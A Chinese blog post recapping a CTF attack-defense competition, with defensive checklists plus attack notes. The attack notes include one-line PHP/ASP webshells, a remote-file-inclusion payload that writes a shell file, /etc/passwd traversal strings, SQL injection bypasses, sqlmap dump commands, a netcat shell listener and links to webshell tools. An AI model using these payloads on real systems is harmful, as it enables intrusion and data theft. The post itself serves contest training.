天天看點

CTF線下賽AWD總結AWD綜合靶場

AWD

CTF線下賽AWD總結AWD綜合靶場

記錄一下自己最近參加的線下攻防比賽,沒時間學習了,就準備了幾天,果然不出意外的被安全專業的大佬打得很慘。

缺點是不會攻擊,我和我隊友兩個人就隻有防,AWD防了400分,綜合滲透拿了200分。

感覺自己的知識欠差很多,代碼審計能力弱,寫腳本能力弱,sql注入我一直學不會。最重要的是比賽前沒有真正練習過,是以比賽時才沒把技能發揮出來。謹記:多實踐,學好代碼審計,sql注入,手動寫腳本!!

比完賽才對這兩種比賽模式有了清晰的了解。

AWD就是每隊有自己要維護的幾台linux靶機,為低權限或者www權限,對自己的網站進行防守,對他人進行攻擊。

綜合滲透分外網,内網,專網,需要先滲透外網,在讓外網作為跳闆機通路内網,專網。

給了兩個靶機是永恒之藍漏洞,但比賽時沒想到,就沒法做,還有一台直接ssh登陸,就有幾個flag。

比賽特别好,服務特别好,邊打比賽,還有水果吃,住的飯店,夥食很棒。對這次比賽滿意,也漲了很多經驗,督促自己如何去學習。下面是比賽時的源碼。内附很多比賽之前看的網站,

一、ssh登陸,修改密碼超級複雜,mobaxterm,xshell。

     普通使用者提權成root,根據kernel版本号找到對應的poc,exp提權。

二、下載下傳源碼,備份,/var/www/html 目錄,mobaxterm,winscp,xftp等。

三、預留後門,禦劍,k8飛刀,D盾,掃描目錄,發現後門,注釋代碼。

四、修改資料庫密碼,

> mysql -u root -p

Show databases;

use mysql;

set password for [email protected] = password('123');  或者

update user set password = PASSWORD('要更換的密碼') where user = 'root';

flush privileges;

show tables;可能有flag。

select * from typecho_flag;

五、關閉不必要的端口,要求的服務端口不能關,

netstat -napt ,lsof -i 檢視端口,

kill -9 PID 殺掉程序

nmap -sV ip位址(-sV參數可以探測目标主機的伺服器版本)

nmap掃描對方開啟的端口,21,22,21,3306,進行爆破,msfconsole進入metasploit ,,,

六、代碼審計  seay源代碼審計好用,

常見漏洞:一句話木馬,SQL注入、檔案包含、檔案上傳,越權通路,指令執行。

  1. 一句話木馬
CTF線下賽AWD總結AWD綜合靶場
CTF線下賽AWD總結AWD綜合靶場
CTF線下賽AWD總結AWD綜合靶場

防:vim自己的網站php檔案,注釋掉一句話木馬,

<?php @eval($_REQUEST['c']); ?>     <?php @eval($_POST['c']); ?>

asp的一句話是:<%eval request("xx")%>

沒有限制檔案上傳類型,允許後門上傳

CTF線下賽AWD總結AWD綜合靶場

攻:菜刀連接配接一句話木馬所在php的網站路徑,輸入密碼,即可進入到背景,擷取網站目錄,進而上傳大馬,擷取最高權限webshell。

沒有的話,自行網站檔案上傳一句話木馬,對檔案類型有限制的話需要BurpSuite抓包,修改content type image/php,根據傳回的路徑,連接配接菜刀。

權限維持:1.不死馬, 2. nc反彈shell  nc -lp 9999

  1. SQL注入漏洞
CTF線下賽AWD總結AWD綜合靶場
CTF線下賽AWD總結AWD綜合靶場

(1)使用者登入,輸入’測試存在sql注入點,萬能密碼 ' or 1='1   弱密碼 admin/admin  火狐插件hackbar

select name,pass from tbAdmin where name='' or 1='1' and pass='123456'

(2)啊D掃描網站sql注入點,sqlmap注入,

比賽時Access資料庫注入點:

http://10.1.14.1/ReadNews.asp?NewsID=20&BigClassID=2&SmallClassID=2

sqlmap -u "url"  檢視系統,版本

sqlmap -u "url" --dbs 爆資料庫

sqlmap -u "url" --tables -D ctf 爆表

sqlmap -u "url" --column -D ctf -T users 爆列

sqlmap -u "url" --dump -D ctf -T users "user_name,user_pass"  爆字段

網站資料庫密碼資訊檔案一般放在config.php中。

3.檔案包含

CTF線下賽AWD總結AWD綜合靶場

(1)本地檔案包含

localhost/a.php?file=/flag.txt

(2)遠端檔案包含

localhost/a.php?file=http:ip/echo.txt

利用,上傳一句話木馬

echo.txt 檔案内容,會生成shell.php  内容為一句話木馬。

<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[xx]);?>");?>

常見的檔案包含函數,include(),include_once(),require(),require_once()

幾種經典的測試方法:

?file=../../../../../etc/passwd  長目錄截斷

?page=file:///etc/passwd   讀取敏感檔案

?home=main.cgi

?page=http://www.a.com/1.php

http://1.1.1.1/../../../../dir/file.txt

4.越權通路   allow_url_fopen  =ON, allow_url_include =ON

水準越權:修改id,通路他人

垂直越權:知道管理背景的url,通過通路,提升權限,擷取資料。

CTF線下賽AWD總結AWD綜合靶場

/admin/upload/config.php  越權通路,無需登陸,直接顯示 

CTF線下賽AWD總結AWD綜合靶場
  1. 指令執行漏洞 

直接調用作業系統指令,常見php函數system,exec,shell_exec

CTF線下賽AWD總結AWD綜合靶場
CTF線下賽AWD總結AWD綜合靶場
CTF線下賽AWD總結AWD綜合靶場
CTF線下賽AWD總結AWD綜合靶場

七、網站防禦

上WAF,檔案監控,安全狗, 

在檔案頭寫上,require_once(‘waf.php’);

八、日志分析,根據自己攻擊payload去攻擊他人。

寫腳本批量拿flag。

綜合靶場

CTF線下賽AWD總結AWD綜合靶場

Nmap掃描靶機,檢視系統,metasploit 漏洞利用,根據相應的系統核心漏洞,提權,

擷取背景密碼,登入背景,根目錄下flag

建立新使用者,添加到管理者組,遠端目标靶機。

可能存在flag的位置:

  1. 禦劍掃描,輕按兩下網頁打開,存在flag。
  2. ssh登陸,系統根目錄下,/var/www/html下
  3. mysql資料庫字段中。
  4. 遠端主機桌面,檔案夾下。

==================網站合集====================

www.51elab.com/product02.html      易霖博

https://www.anquanke.com/        安全客  很棒

http://www.freebuf.com/         freebuf

http://www.mumaasp.com/139.html     很厲害的大馬

http://webshell8.com/

http://www.jiaoben.net/wenzhanglist/93.html    腳本之家

==========================

線下賽筆記

https://blog.csdn.net/wy_97/article/details/78148705

http://www.sohu.com/a/211760248_99907709

https://www.anquanke.com/post/id/86984

https://www.anquanke.com/post/id/98574

https://www.anquanke.com/post/id/98653

https://www.anquanke.com/post/id/100991

https://www.anquanke.com/post/id/84675

http://tinyfisher.github.io/security/2017/10/02/CTF

http://www.freebuf.com/articles/web/118149.html

https://blog.csdn.net/like98k/article/details/80261603

=============================

https://www.exploit-db.com/exploits/15620/           漏洞

http://exploit.linuxnote.org/                核心漏洞

https://www.cnblogs.com/linuxsec/articles/6110887.html      提權

https://www.cnblogs.com/yuhuLin/p/7027342.html         普通使用者提權

http://www.freebuf.com/sectool/121847.html         Linux提權?這四個腳本可以幫助你

https://github.com/Ares-X/AWD-Predator-Framework          AWD攻防賽webshell批量利用架構

https://github.com/admintony/Prepare-for-AWD      AWD線下賽腳本集合

https://github.com/ssooking/CTFDefense        CTFDefense

https://github.com/wupco/weblogger            針對ctf線下賽流量抓取(php)、真實環境流量抓取分析的工具

http://hackblog.cn/post/75.html             waf

https://jingyan.baidu.com/article/d45ad148a8338769552b803a.html   安全狗安裝教程

http://www.safedog.cn/website_safedog.html             安全狗linux版:

https://blog.csdn.net/qq_36328915/article/details/79305166     kali中msf常用指令

http://www.freebuf.com/articles/5472.html                   w3af簡單使用教程

https://www.cnblogs.com/zylq-blog/p/6694566.html         安裝

http://blog.51cto.com/simeon/1981572            MySQL資料庫***及漏洞利用總結

http://blog.51cto.com/diudiu/1678358           SQLmap配合一句話木馬

                        利用Sqlmap進行Access和MySQL的注入

https://note.youdao.com/share/?id=62ecd676d896139c823591e8a8bcc708&type=note#/